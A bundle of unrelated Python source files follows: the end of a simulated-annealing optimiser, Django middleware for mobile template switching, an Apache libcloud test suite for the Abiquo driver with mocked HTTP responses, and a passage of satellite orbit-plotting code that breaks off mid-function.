global minimum: xmin = [-4.26437714e-09 -3.91699361e-09 -1.86149218e-09 -3.97165720e-09
-6.29151648e-09 -6.53145322e-09 -3.93616815e-09 -6.55623025e-09
-6.05775280e-09 -5.00668935e-09], f(xmin) = 0.000000
"""
if x0 is not None and not len(x0) == len(bounds):
raise ValueError('Bounds size does not match x0')
lu = list(zip(*bounds))
lower = np.array(lu[0])
upper = np.array(lu[1])
# Check that restart temperature ratio is correct
if restart_temp_ratio <= 0. or restart_temp_ratio >= 1.:
raise ValueError('Restart temperature ratio has to be in range (0, 1)')
# Checking bounds are valid
if (np.any(np.isinf(lower)) or np.any(np.isinf(upper)) or np.any(
np.isnan(lower)) or np.any(np.isnan(upper))):
raise ValueError('Some bounds values are inf values or nan values')
# Checking that bounds are consistent
if not np.all(lower < upper):
raise ValueError('Bounds are not consistent min < max')
# Checking that bounds are the same length
if not len(lower) == len(upper):
raise ValueError('Bounds do not have the same dimensions')
# Wrapper for the objective function
func_wrapper = ObjectiveFunWrapper(func, maxfun, *args)
# Wrapper fot the minimizer
minimizer_wrapper = LocalSearchWrapper(
bounds, func_wrapper, **local_search_options)
# Initialization of RandomState for reproducible runs if seed provided
rand_state = check_random_state(seed)
# Initialization of the energy state
energy_state = EnergyState(lower, upper, callback)
energy_state.reset(func_wrapper, rand_state, x0)
# Minimum value of annealing temperature reached to perform
# re-annealing
temperature_restart = initial_temp * restart_temp_ratio
# VisitingDistribution instance
visit_dist = VisitingDistribution(lower, upper, visit, rand_state)
# Strategy chain instance
strategy_chain = StrategyChain(accept, visit_dist, func_wrapper,
minimizer_wrapper, rand_state, energy_state)
# Run the search loop
need_to_stop = False
iteration = 0
message = []
t1 = np.exp((visit - 1) * np.log(2.0)) - 1.0
while(not need_to_stop):
for i in range(maxiter):
# Compute temperature for this step
s = float(i) + 2.0
t2 = np.exp((visit - 1) * np.log(s)) - 1.0
temperature = initial_temp * t1 / t2
if iteration >= maxiter:
message.append("Maximum number of iteration reached")
need_to_stop = True
break
# Need a re-annealing process?
if temperature < temperature_restart:
energy_state.reset(func_wrapper, rand_state)
break
# starting strategy chain
val = strategy_chain.run(i, temperature)
if val is not None:
message.append(val)
need_to_stop = True
break
# Possible local search at the end of the strategy chain
if not no_local_search:
val = strategy_chain.local_search()
if val is not None:
message.append(val)
need_to_stop = True
break
iteration += 1
# Return the OptimizeResult
res = OptimizeResult()
res.x = energy_state.xbest
res.fun = energy_state.ebest
res.nit = iteration
res.nfev = func_wrapper.nfev
res.njev = func_wrapper.ngev
res.nhev = func_wrapper.nhev
res.message = message
return res
|
|
# -*- coding: utf-8 -*-
import re
import random
from types import MethodType
from django.http import HttpResponseRedirect
from django.http import SimpleCookie
from django.http import HttpRequest
from django.conf import settings
try:
from threading import local
except ImportError:
from django.utils._threading_local import local
# Instead changing ``settings.TEMPLATE_DIRS`` on the fly, what could
# not work properly when there is concurrent requests, we use
# thread-local variables to determine the template directory used for
# mobile requests, so the template loader
# ``opps.contrib.mobile.template.Loader`` can be used instead to
# define the right templates in each of your project views.
THREAD_LOCALS = local()
def _set_cookie(self, key, value='', max_age=None, expires=None, path='/',
domain=None, secure=False):
self._resp_cookies[key] = value
self.COOKIES[key] = value
if max_age is not None:
self._resp_cookies[key]['max-age'] = max_age
if expires is not None:
self._resp_cookies[key]['expires'] = expires
if path is not None:
self._resp_cookies[key]['path'] = path
if domain is not None:
self._resp_cookies[key]['domain'] = domain
if secure:
self._resp_cookies[key]['secure'] = True
def _delete_cookie(self, key, path='/', domain=None):
self.set_cookie(key, max_age=0, path=path, domain=domain,
expires='Thu, 01-Jan-1970 00:00:00 GMT')
try:
del self.COOKIES[key]
except KeyError:
pass
IGNORE_AGENTS = getattr(settings, 'OPPS_MOBILE_IGNORE_USER_AGENTS', [])
USER_AGENTS_TEST_MATCH = (
"w3c ", "acs-", "alav", "alca", "amoi", "audi",
"avan", "benq", "bird", "blac", "blaz", "brew",
"cell", "cldc", "cmd-", "dang", "doco", "eric",
"hipt", "inno", "ipaq", "java", "jigs", "kddi",
"keji", "leno", "lg-c", "lg-d", "lg-g", "lge-",
"maui", "maxo", "midp", "mits", "mmef", "mobi",
"mot-", "moto", "mwbp", "nec-", "newt", "noki",
"xda", "palm", "pana", "pant", "phil", "play",
"port", "prox", "qwap", "sage", "sams", "sany",
"sch-", "sec-", "send", "seri", "sgh-", "shar",
"sie-", "siem", "smal", "smar", "sony", "sph-",
"symb", "t-mo", "teli", "tim-", "tosh", "tsm-",
"upg1", "upsi", "vk-v", "voda", "wap-", "wapa",
"wapi", "wapp", "wapr", "webc", "winw", "winw",
"xda-",)
USER_AGENTS_TEST_SEARCH = u"(?:%s)" % u'|'.join((
'up.browser', 'up.link', 'mmp', 'symbian', 'smartphone', 'midp',
'wap', 'phone', 'windows ce', 'pda', 'mobile', 'mini', 'palm',
'netfront', 'opera mobi',))
USER_AGENTS_EXCEPTION_SEARCH = u"(?:%s)" % u'|'.join(('ipad',))
HTTP_ACCEPT_REGEX = re.compile("application/vnd\.wap\.xhtml\+xml",
re.IGNORECASE)
def is_mobile_agent(request):
user_agents_test_match = r'^(?:%s)' % '|'.join(
USER_AGENTS_TEST_MATCH)
user_agents_test_match_regex = re.compile(
user_agents_test_match, re.IGNORECASE)
user_agents_test_search_regex = re.compile(
USER_AGENTS_TEST_SEARCH, re.IGNORECASE)
user_agents_exception_search_regex = re.compile(
USER_AGENTS_EXCEPTION_SEARCH, re.IGNORECASE)
is_mobile = False
if 'HTTP_USER_AGENT' in request.META:
user_agent = request.META['HTTP_USER_AGENT']
if user_agents_test_search_regex.search(user_agent) and \
not user_agents_exception_search_regex.search(user_agent):
is_mobile = True
else:
if 'HTTP_ACCEPT' in request.META:
http_accept = request.META['HTTP_ACCEPT']
if HTTP_ACCEPT_REGEX.search(http_accept):
is_mobile = True
if not is_mobile:
if user_agents_test_match_regex.match(user_agent):
is_mobile = True
# Check for ignore user agents
if IGNORE_AGENTS and user_agent in IGNORE_AGENTS:
is_mobile = False
return is_mobile
class MobileDetectionMiddleware(object):
u"""Used django-mobile core
https://github.com/gregmuellegger/django-mobile/blob/3093a9791e5e812021e49
3226e5393033115c8bf/django_mobile/middleware.py
"""
def process_request(self, request):
is_mobile = is_mobile_agent(request)
request.is_mobile = is_mobile
THREAD_LOCALS.template_dirs = settings.TEMPLATE_DIRS_WEB
if is_mobile and settings.OPPS_CHECK_MOBILE:
THREAD_LOCALS.template_dirs = settings.TEMPLATE_DIRS_MOBILE
if settings.OPPS_DOMAIN_MOBILE and \
request.META.get('HTTP_HOST', '') != \
settings.OPPS_DOMAIN_MOBILE:
return HttpResponseRedirect(u"{0}://{1}{2}".format(
settings.OPPS_PROTOCOL_MOBILE,
settings.OPPS_DOMAIN_MOBILE,
request.path
))
class MobileRedirectMiddleware(object):
"""
Allows setting and deleting of cookies from requests in exactly the same
way as responses.
request.set_cookie('name', 'value')
The set_cookie and delete_cookie are exactly the same as the ones built
into the Django HttpResponse class.
http://docs.djangoproject.com/en/dev/ref/request-response
/#django.http.HttpResponse.set_cookie
"""
def process_request(self, request):
domain = request.META.get('HTTP_HOST', '')
mobile_domain = settings.OPPS_DOMAIN_MOBILE
current_cookie = request.COOKIES.get('template_mode', None)
template_mode = request.GET.get('template_mode', None)
THREAD_LOCALS.template_dirs = settings.TEMPLATE_DIRS_WEB
if hasattr(request, "is_mobile"):
agent_is_mobile = request.is_mobile
else:
agent_is_mobile = is_mobile_agent(request)
domain_is_mobile = domain == mobile_domain
request_is_mobile = agent_is_mobile and domain_is_mobile
if not template_mode and not current_cookie:
if domain_is_mobile:
template_mode = u'mobile'
else:
return
if request_is_mobile and template_mode == u'desktop':
prot = settings.OPPS_PROTOCOL_WEB
web_domain = settings.OPPS_DOMAIN_WEB
url = u"{0}://{1}/?template_mode=desktop".format(prot, web_domain)
return HttpResponseRedirect(url)
elif not request_is_mobile and template_mode == u'mobile':
prot = settings.OPPS_PROTOCOL_MOBILE
url = u"{0}://{1}/?template_mode=mobile".format(prot,
mobile_domain)
# set cache prefix randon in mobile device
settings.CACHE_MIDDLEWARE_KEY_PREFIX = u"opps_site-{0}-{1}".format(
settings.SITE_ID, random.getrandbits(32))
return HttpResponseRedirect(url)
request._resp_cookies = SimpleCookie()
request.set_cookie = MethodType(_set_cookie, request, HttpRequest)
request.delete_cookie = MethodType(
_delete_cookie, request, HttpRequest
)
if template_mode:
request.set_cookie('template_mode', template_mode)
current_cookie = template_mode
if current_cookie and current_cookie.strip().lower() == u"mobile":
THREAD_LOCALS.template_dirs = settings.TEMPLATE_DIRS_MOBILE
def process_response(self, request, response):
if hasattr(request, '_resp_cookies') and request._resp_cookies:
response.cookies.update(request._resp_cookies)
return response
|
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Abiquo Test Suite
"""
import sys
from libcloud.utils.py3 import ET
from libcloud.utils.py3 import httplib
from libcloud.compute.drivers.abiquo import AbiquoNodeDriver
from libcloud.common.abiquo import ForbiddenError, get_href
from libcloud.common.types import InvalidCredsError, LibcloudError
from libcloud.compute.base import NodeLocation, NodeImage
from libcloud.test.compute import TestCaseMixin
from libcloud.test import MockHttp, unittest
from libcloud.test.file_fixtures import ComputeFileFixtures
class AbiquoNodeDriverTest(TestCaseMixin, unittest.TestCase):
"""
Abiquo Node Driver test suite
"""
@classmethod
def setUpClass(cls):
"""
Set up the driver with the main user
"""
AbiquoNodeDriver.connectionCls.conn_class = AbiquoMockHttp
cls.driver = AbiquoNodeDriver('son', 'goku',
'http://dummy.host.com/api')
def test_unauthorized_controlled(self):
"""
Test the Unauthorized Exception is Controlled.
Test, through the 'login' method, that a '401 Unauthorized'
raises a 'InvalidCredsError' instead of the 'MalformedUrlException'
"""
self.assertRaises(InvalidCredsError, AbiquoNodeDriver, 'son',
'goten', 'http://dummy.host.com/api')
def test_forbidden_controlled(self):
"""
Test the Forbidden Exception is Controlled.
Test, through the 'list_images' method, that a '403 Forbidden'
raises an 'ForbidenError' instead of the 'MalformedUrlException'
"""
AbiquoNodeDriver.connectionCls.conn_class = AbiquoMockHttp
conn = AbiquoNodeDriver('son', 'gohan', 'http://dummy.host.com/api')
self.assertRaises(ForbiddenError, conn.list_images)
def test_handle_other_errors_such_as_not_found(self):
"""
Test common 'logical' exceptions are controlled.
Test that common exception (normally 404-Not Found and 409-Conflict),
that return an XMLResponse with the explanation of the errors are
controlled.
"""
self.driver = AbiquoNodeDriver('go', 'trunks',
'http://dummy.host.com/api')
self.assertRaises(LibcloudError, self.driver.list_images)
def test_ex_create_and_delete_empty_group(self):
"""
Test the creation and deletion of an empty group.
"""
group = self.driver.ex_create_group('libcloud_test_group')
group.destroy()
def test_create_node_no_image_raise_exception(self):
"""
Test 'create_node' without image.
Test the 'create_node' function without 'image' parameter raises
an Exception
"""
self.assertRaises(LibcloudError, self.driver.create_node)
def test_list_locations_response(self):
if not self.should_list_locations:
return None
locations = self.driver.list_locations()
self.assertTrue(isinstance(locations, list))
def test_create_node_specify_location(self):
"""
Test you can create a node specifying the location.
"""
image = self.driver.list_images()[0]
location = self.driver.list_locations()[0]
self.driver.create_node(image=image, location=location)
def test_create_node_specify_wrong_location(self):
"""
Test you can not create a node with wrong location.
"""
image = self.driver.list_images()[0]
location = NodeLocation(435, 'fake-location', 'Spain', self.driver)
self.assertRaises(LibcloudError, self.driver.create_node, image=image,
location=location)
def test_create_node_specify_wrong_image(self):
"""
Test image compatibility.
Some locations only can handle a group of images, not all of them.
Test you can not create a node with incompatible image-location.
"""
# Create fake NodeImage
image = NodeImage(3234, 'dummy-image', self.driver)
location = self.driver.list_locations()[0]
# With this image, it should raise an Exception
self.assertRaises(LibcloudError, self.driver.create_node, image=image,
location=location)
def test_create_node_specify_group_name(self):
"""
Test 'create_node' into a concrete group.
"""
image = self.driver.list_images()[0]
self.driver.create_node(image=image, group_name='new_group_name')
def test_create_group_location_does_not_exist(self):
"""
Test 'create_node' with an unexistent location.
Defines a 'fake' location and tries to create a node into it.
"""
location = NodeLocation(435, 'fake-location', 'Spain', self.driver)
# With this location, it should raise an Exception
self.assertRaises(LibcloudError, self.driver.ex_create_group,
name='new_group_name',
location=location)
def test_destroy_node_response(self):
"""
'destroy_node' basic test.
Override the destroy to return a different node available
to be undeployed. (by default it returns an already undeployed node,
for test creation).
"""
self.driver = AbiquoNodeDriver('go', 'trunks',
'http://dummy.host.com/api')
node = self.driver.list_nodes()[0]
ret = self.driver.destroy_node(node)
self.assertTrue(ret)
def test_destroy_node_response_failed(self):
"""
'destroy_node' asynchronous error.
Test that the driver handles correctly when, for some reason,
the 'destroy' job fails.
"""
self.driver = AbiquoNodeDriver('muten', 'roshi',
'http://dummy.host.com/api')
node = self.driver.list_nodes()[0]
ret = self.driver.destroy_node(node)
self.assertFalse(ret)
def test_destroy_node_allocation_state(self):
"""
Test the 'destroy_node' invalid state.
Try to destroy a node when the node is not running.
"""
self.driver = AbiquoNodeDriver('ve', 'geta',
'http://dummy.host.com/api')
# Override the destroy to return a different node available to be
# undeployed
node = self.driver.list_nodes()[0]
# The mock class with the user:password 've:geta' returns a node that
# is in 'ALLOCATION' state and hence, the 'destroy_node' method should
# raise a LibcloudError
self.assertRaises(LibcloudError, self.driver.destroy_node, node)
def test_destroy_not_deployed_group(self):
"""
Test 'ex_destroy_group' when group is not deployed.
"""
location = self.driver.list_locations()[0]
group = self.driver.ex_list_groups(location)[1]
self.assertTrue(group.destroy())
def test_destroy_deployed_group(self):
"""
Test 'ex_destroy_group' when there are machines running.
"""
location = self.driver.list_locations()[0]
group = self.driver.ex_list_groups(location)[0]
self.assertTrue(group.destroy())
def test_destroy_deployed_group_failed(self):
"""
Test 'ex_destroy_group' fails.
Test driver handles correctly when, for some reason, the
asynchronous job fails.
"""
self.driver = AbiquoNodeDriver('muten', 'roshi',
'http://dummy.host.com/api')
location = self.driver.list_locations()[0]
group = self.driver.ex_list_groups(location)[0]
self.assertFalse(group.destroy())
def test_destroy_group_invalid_state(self):
"""
Test 'ex_destroy_group' invalid state.
Test the Driver raises an exception when the group is in
invalid temporal state.
"""
self.driver = AbiquoNodeDriver('ve', 'geta',
'http://dummy.host.com/api')
location = self.driver.list_locations()[0]
group = self.driver.ex_list_groups(location)[1]
self.assertRaises(LibcloudError, group.destroy)
def test_run_node(self):
"""
Test 'ex_run_node' feature.
"""
node = self.driver.list_nodes()[0]
# Node is by default in NodeState.TERMINATED and AbiquoState ==
# 'NOT_ALLOCATED'
# so it is available to be runned
self.driver.ex_run_node(node)
def test_run_node_invalid_state(self):
"""
Test 'ex_run_node' invalid state.
Test the Driver raises an exception when try to run a
node that is in invalid state to run.
"""
self.driver = AbiquoNodeDriver('go', 'trunks',
'http://dummy.host.com/api')
node = self.driver.list_nodes()[0]
# Node is by default in AbiquoState = 'ON' for user 'go:trunks'
# so is not available to be runned
self.assertRaises(LibcloudError, self.driver.ex_run_node, node)
def test_run_node_failed(self):
"""
Test 'ex_run_node' fails.
Test driver handles correctly when, for some reason, the
asynchronous job fails.
"""
self.driver = AbiquoNodeDriver('ten', 'shin',
'http://dummy.host.com/api')
node = self.driver.list_nodes()[0]
# Node is in the correct state, but it fails because of the
# async task and it raises the error.
self.assertRaises(LibcloudError, self.driver.ex_run_node, node)
def test_get_href(self):
xml = '''
<datacenter>
<link href="http://10.60.12.7:80/api/admin/datacenters/2"
type="application/vnd.abiquo.datacenter+xml" rel="edit1"/>
<link href="http://10.60.12.7:80/ponies/bar/foo/api/admin/datacenters/3"
type="application/vnd.abiquo.datacenter+xml" rel="edit2"/>
<link href="http://vdcbridge.interoute.com:80/jclouds/apiouds/api/admin/enterprises/1234"
type="application/vnd.abiquo.datacenter+xml" rel="edit3"/>
</datacenter>
'''
elem = ET.XML(xml)
href = get_href(element=elem, rel='edit1')
self.assertEqual(href, '/admin/datacenters/2')
href = get_href(element=elem, rel='edit2')
self.assertEqual(href, '/admin/datacenters/3')
href = get_href(element=elem, rel='edit3')
self.assertEqual(href, '/admin/enterprises/1234')
class AbiquoMockHttp(MockHttp):
"""
Mock the functionallity of the remote Abiquo API.
"""
fixtures = ComputeFileFixtures('abiquo')
fixture_tag = 'default'
def _api_login(self, method, url, body, headers):
if headers['Authorization'] == 'Basic c29uOmdvdGVu':
expected_response = self.fixtures.load('unauthorized_user.html')
expected_status = httplib.UNAUTHORIZED
else:
expected_response = self.fixtures.load('login.xml')
expected_status = httplib.OK
return (expected_status, expected_response, {}, '')
def _api_cloud_virtualdatacenters(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('vdcs.xml'), {}, '')
def _api_cloud_virtualdatacenters_4(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('vdc_4.xml'), {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances(self, method, url, body, headers):
if method == 'POST':
vapp_name = ET.XML(body).findtext('name')
if vapp_name == 'libcloud_test_group':
# we come from 'test_ex_create_and_delete_empty_group(self):'
# method and so, we return the 'ok' return
response = self.fixtures.load('vdc_4_vapp_creation_ok.xml')
return (httplib.OK, response, {}, '')
elif vapp_name == 'new_group_name':
# we come from 'test_ex_create_and_delete_empty_group(self):'
# method and so, we return the 'ok' return
response = self.fixtures.load('vdc_4_vapp_creation_ok.xml')
return (httplib.OK, response, {}, '')
else:
# It will be a 'GET';
return (httplib.OK, self.fixtures.load('vdc_4_vapps.xml'), {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_5(self, method, url, body, headers):
if method == 'GET':
if headers['Authorization'] == 'Basic dmU6Z2V0YQ==':
# Try to destroy a group with 'needs_sync' state
response = self.fixtures.load('vdc_4_vapp_5_needs_sync.xml')
else:
# Try to destroy a group with 'undeployed' state
response = self.fixtures.load('vdc_4_vapp_5.xml')
return (httplib.OK, response, {}, '')
else:
# it will be a 'DELETE'
return (httplib.NO_CONTENT, '', {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6(self, method, url, body, headers):
if method == 'GET':
# deployed vapp
response = self.fixtures.load('vdc_4_vapp_6.xml')
return (httplib.OK, response, {}, '')
else:
# it will be a 'DELETE'
return (httplib.NO_CONTENT, '', {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_tasks_1da8c8b6_86f6_49ef_9d29_57dcc73b875a(self, method, url, body, headers):
if headers['Authorization'] == 'Basic bXV0ZW46cm9zaGk=':
# User 'muten:roshi' failed task
response = self.fixtures.load(
'vdc_4_vapp_6_undeploy_task_failed.xml')
else:
response = self.fixtures.load('vdc_4_vapp_6_undeploy_task.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_5_virtualmachines(
self, method, url, body, headers):
# This virtual app never have virtual machines
if method == 'GET':
response = self.fixtures.load('vdc_4_vapp_5_vms.xml')
return (httplib.OK, response, {}, '')
elif method == 'POST':
# it must be a POST
response = self.fixtures.load('vdc_4_vapp_6_vm_creation_ok.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines(
self, method, url, body, headers):
# Default-created virtual app virtual machines'
if method == 'GET':
if headers['Authorization'] == 'Basic dmU6Z2V0YQ==':
response = self.fixtures.load('vdc_4_vapp_6_vms_allocated.xml')
else:
response = self.fixtures.load('vdc_4_vapp_6_vms.xml')
return (httplib.OK, response, {}, '')
else:
# it must be a POST
response = self.fixtures.load('vdc_4_vapp_6_vm_creation_ok.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3(self, method, url, body, headers):
if (headers['Authorization'] == 'Basic Z286dHJ1bmtz' or
headers['Authorization'] == 'Basic bXV0ZW46cm9zaGk='):
# Undeploy node
response = self.fixtures.load("vdc_4_vapp_6_vm_3_deployed.xml")
elif headers['Authorization'] == 'Basic dmU6Z2V0YQ==':
# Try to undeploy a node with 'allocation' state
response = self.fixtures.load('vdc_4_vapp_6_vm_3_allocated.xml')
else:
# Get node
response = self.fixtures.load('vdc_4_vapp_6_vm_3.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_action_deploy(self, method, url,
body, headers):
response = self.fixtures.load('vdc_4_vapp_6_vm_3_deploy.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_tasks_b44fe278_6b0f_4dfb_be81_7c03006a93cb(self, method, url, body, headers):
if headers['Authorization'] == 'Basic dGVuOnNoaW4=':
# User 'ten:shin' failed task
response = self.fixtures.load(
'vdc_4_vapp_6_vm_3_deploy_task_failed.xml')
else:
response = self.fixtures.load('vdc_4_vapp_6_vm_3_deploy_task.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_action_undeploy(
self, method, url, body, headers):
response = self.fixtures.load('vdc_4_vapp_6_undeploy.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_action_reset(self, method,
url, body, headers):
response = self.fixtures.load('vdc_4_vapp_6_vm_3_reset.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_tasks_a8c9818e_f389_45b7_be2c_3db3a9689940(self, method, url, body, headers):
if headers['Authorization'] == 'Basic bXV0ZW46cm9zaGk=':
# User 'muten:roshi' failed task
response = self.fixtures.load(
'vdc_4_vapp_6_undeploy_task_failed.xml')
else:
response = self.fixtures.load('vdc_4_vapp_6_vm_3_reset_task.xml')
return (httplib.OK, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_action_undeploy(self, method, url,
body, headers):
response = self.fixtures.load('vdc_4_vapp_6_vm_3_undeploy.xml')
return (httplib.CREATED, response, {}, '')
def _api_cloud_virtualdatacenters_4_virtualappliances_6_virtualmachines_3_network_nics(self, method, url,
body, headers):
response = self.fixtures.load('vdc_4_vapp_6_vm_3_nics.xml')
return (httplib.OK, response, {}, '')
def _api_admin_datacenters(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('dcs.xml'), {}, '')
def _api_admin_enterprises_1(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('ent_1.xml'), {}, '')
def _api_admin_enterprises_1_datacenterrepositories(self, method, url, body, headers):
# When the user is the common one for all the tests ('son, 'goku')
# it creates this basic auth and we return the datacenters value
if headers['Authorization'] == 'Basic Z286dHJ1bmtz':
expected_response = self.fixtures.load("not_found_error.xml")
return (httplib.NOT_FOUND, expected_response, {}, '')
elif headers['Authorization'] != 'Basic c29uOmdvaGFu':
return (httplib.OK, self.fixtures.load('ent_1_dcreps.xml'), {}, '')
else:
# son:gohan user: forbidden error
expected_response = self.fixtures.load("privilege_errors.html")
return (httplib.FORBIDDEN, expected_response, {}, '')
def _api_admin_enterprises_1_datacenterrepositories_2(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('ent_1_dcrep_2.xml'), {}, '')
def _api_admin_enterprises_1_datacenterrepositories_2_virtualmachinetemplates(self, method, url, body, headers):
return (httplib.OK, self.fixtures.load('ent_1_dcrep_2_templates.xml'),
{}, '')
def _api_admin_enterprises_1_datacenterrepositories_2_virtualmachinetemplates_11(self, method, url, body, headers):
return (
httplib.OK, self.fixtures.load('ent_1_dcrep_2_template_11.xml'),
{}, '')
if __name__ == '__main__':
sys.exit(unittest.main())
|
|
import os
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from orbitdeterminator.doppler.utils.constants import *
from orbitdeterminator.doppler.utils.utils import *
from mpl_toolkits.mplot3d import Axes3D
def plot_sphere(ax, d:np.ndarray, n:np.ndarray) -> None:
""" Plots a sphere on a given axes object.
Args:
ax (matplotlib.axes): axes to plot on
d (float): sphere diameter
n (float): grid resolution
"""
u = np.linspace(0, np.pi, n)
v = np.linspace(0, 2 * np.pi, n)
x = d * np.outer(np.sin(u), np.sin(v))
y = d * np.outer(np.sin(u), np.cos(v))
z = d * np.outer(np.cos(u), np.ones_like(v))
ax.plot_wireframe(x, y, z, alpha=0.2, linewidth=1, color='gray')
def plot_earth(ax, d:np.ndarray, filename:str, angle=0):
""" Plots Earth.
Source: https://stackoverflow.com/questions/53074908/map-an-image-onto-a-sphere-and-plot-3d-trajectories
"""
img = plt.imread(filename)
# define a grid matching the map size, subsample along with pixels
u = np.linspace(0, np.pi, img.shape[0])
v = np.linspace(0+angle, 2*np.pi+angle, img.shape[1])
count = 180 # keep 180 points along theta and phi
u_idx = np.linspace(0, img.shape[0] - 1, count).round().astype(int)
v_idx = np.linspace(0, img.shape[1] - 1, count).round().astype(int)
u, v = u[u_idx], v[v_idx]
img = img[np.ix_(u_idx, v_idx)]
u,v = np.meshgrid(u, v)
# sphere
x = d * np.sin(u) * np.cos(v)
y = d * np.sin(u) * np.sin(v)
z = d * np.cos(u)
# create 3d Axes
ax.plot_surface(x.T, y.T, z.T, facecolors=img/255, cstride=1, rstride=1) # we've already pruned ourselves
# make the plot more spherical
#ax.axis('scaled')
def plot_example_3d(x_sat_orbdyn_stm:np.ndarray, x_obs_multiple:np.ndarray, title=None):
""" Plots a sphere, site position and satellite trajectory.
Args:
x_sat_orbdyn_stm (np.array): satellite trajectory array.
x_obs_multiple (np.array): observer positions.
"""
font = {'size': 16}
matplotlib.rc('font', **font)
fig = plt.figure(figsize=(14,14))
ax1 = fig.add_subplot(111, projection='3d')
# Dimension fix
if len(x_obs_multiple.shape) == 2:
x_obs_multiple = np.expand_dims(x_obs_multiple)
#plot_sphere(ax1, d=R_EQ, n=40)
s = [] # Scatter instances
l = [] # Legends
for i in range(x_obs_multiple.shape[2]):
# TODO: Check first argument
ss = ax1.scatter(x_obs_multiple[0,:,i], x_obs_multiple[1,:,i], x_obs_multiple[2,:,i], marker='.', s=4)
st = ax1.scatter(x_obs_multiple[0,0,i], x_obs_multiple[1,0,i], x_obs_multiple[2,0,i], c=ss.get_facecolors())
s.append(st)
l.append(f"Observer {i}")
ax1.set_xlabel("x ECI (m)", fontsize=16, labelpad=10)
ax1.set_ylabel("y ECI (m)", fontsize=16, labelpad=10)
ax1.set_zlabel("z ECI (m)", fontsize=16, labelpad=10)
s4 = ax1.scatter(x_sat_orbdyn_stm[0,0], x_sat_orbdyn_stm[1,0], x_sat_orbdyn_stm[2,0], c='k')
ax1.scatter(x_sat_orbdyn_stm[0,:], x_sat_orbdyn_stm[1,:], x_sat_orbdyn_stm[2,:], marker='.', c='k', s=1)
s.append(s4)
l.append('Satellite')
if title is not None:
ax1.title.set_text('Scenario example')
ax1.legend((s), (l), loc=2, bbox_to_anchor=(0.15,0.9))
return fig
def plot_range_range_rate(x_sat_orbdyn_stm:np.ndarray, x_obs_multiple:np.ndarray, t_sec: np.array):
""" Plots range and range relative to the station
Args:
x_sat_orbdyn_stm (np.ndarray): satellite trajectory array.
x_obs_multiple (np.ndarray): observer positions.
t_sec (np.ndarray): array of timesteps.
"""
if len(x_obs_multiple.shape) == 2:
x_obs_multiple = np.expand_dims(x_obs_multiple)
fig = plt.figure(figsize=(14,14))
n_obs = x_obs_multiple.shape[2]
for i in range(n_obs):
r, rr = range_range_rate(x_sat_orbdyn_stm, x_obs_multiple[:,:,i])
ax1 = fig.add_subplot(n_obs, 2, i*2+1)
ax1.plot(t_sec, r)
ax1.set_xlabel('Time (s)')
ax1.set_ylabel('Range (m)')
ax1.grid(':')
ax1.title.set_text('Station 1 - Range')
ax2 = fig.add_subplot(n_obs, 2, i*2+2)
ax2.plot(t_sec, rr)
ax2.set_xlabel('Time (s)')
ax2.set_ylabel('Range rate (m/s)')
ax2.grid(':')
ax2.title.set_text('Station 1 - Range Rate')
fig.subplots_adjust(hspace=0.3)
return fig
def plot_pos_vel_norms(x_sat:np.ndarray, t_sec: np.array):
""" Plots range and range relative to the station
Args:
x_sat_orbdyn_stm (np.ndarray): satellite trajectory array.
x_obs_multiple (np.ndarray): observer positions.
t_sec (np.ndarray): array of timesteps.
"""
r = np.linalg.norm(x_sat[0:3,], axis=0) # Norm of the position
v = np.linalg.norm(x_sat[3:6,], axis=0) # Norm of the velocity
fig = plt.figure(figsize=(14,7))
ax1 = fig.add_subplot(1, 2, 1)
ax1.plot(t_sec, r)
ax1.set_xlabel('Time (s)')
ax1.set_ylabel('Satellite position norm (m)')
ax1.grid(':')
ax1.title.set_text('Position Norm')
ax2 = fig.add_subplot(1, 2, 2)
ax2.plot(t_sec, v)
ax2.set_xlabel('Time (s)')
ax2.set_ylabel('Satellite velocity norm (m/s)')
ax2.grid(':')
ax2.title.set_text('Velocity Norm')
fig.subplots_adjust(hspace=0.25)
return fig
def plot_batch_results(
x_sat_orbdyn_stm:np.ndarray,
x_0r:np.ndarray,
x_br:np.ndarray,
x_berr:np.ndarray
):
""" Plot relevant converged batch results.
Args:
x_sat_orbdyn_stm (np.ndarray): True satellite position.
x_0r (np.ndarray): array of random initial sampled positions.
x_br (np.ndarray): array of batch estimates of initial positions.
x_berr (np.ndarray): array of errors relative to x_0
Returns:
fig
"""
fig = plt.figure(figsize=(14,14))
ax1 = fig.add_subplot(111, projection='3d')
font = {'size': 16}
matplotlib.rc('font', **font)
plt.ticklabel_format(axis="y", style="sci", scilimits=(0,0))
# Groundtruth
